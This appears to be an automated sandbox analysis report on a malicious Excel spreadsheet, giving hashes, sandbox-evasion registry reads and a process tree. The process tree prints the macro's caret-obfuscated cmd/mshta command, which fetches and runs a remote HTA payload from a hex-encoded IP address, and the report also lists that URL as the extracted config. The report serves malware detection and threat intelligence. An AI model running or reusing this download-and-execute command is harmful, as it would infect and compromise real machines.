Analysis
-
max time kernel
130s -
max time network
130s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
20-01-2022 11:43
Behavioral task
behavioral1
Sample
edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls
Resource
win10-en-20211208
General
-
Target
edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls
-
Size
142KB
-
MD5
81f0a7a1ad8bf108c2648af767e77fcd
-
SHA1
9575d97617b4d5b9c22f5d2a0fbfbd3de1ad3de4
-
SHA256
edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878
-
SHA512
6ed134fd7cba8ddd3c195f5e31a1ce996b8bc5403933a47a23666b483720eb140ca7a8ba5fda71961ef5c7125e9a5b5575f60fb57d3c48879df75bb1980c5967
Malware Config
Extracted
http://0xb907d607/fer/fer.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2780 1892 cmd.exe 68 -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid Process 43 1152 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 1892 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid Process 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE 1892 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid Process procid_target PID 1892 wrote to memory of 2684 1892 EXCEL.EXE 70 PID 1892 wrote to memory of 2684 1892 EXCEL.EXE 70 PID 1892 wrote to memory of 2780 1892 EXCEL.EXE 72 PID 1892 wrote to memory of 2780 1892 EXCEL.EXE 72 PID 2780 wrote to memory of 1152 2780 cmd.exe 74 PID 2780 wrote to memory of 1152 2780 cmd.exe 74
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2684
-
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fer.html3⤵
- Blocklisted process makes network request
PID:1152
-
-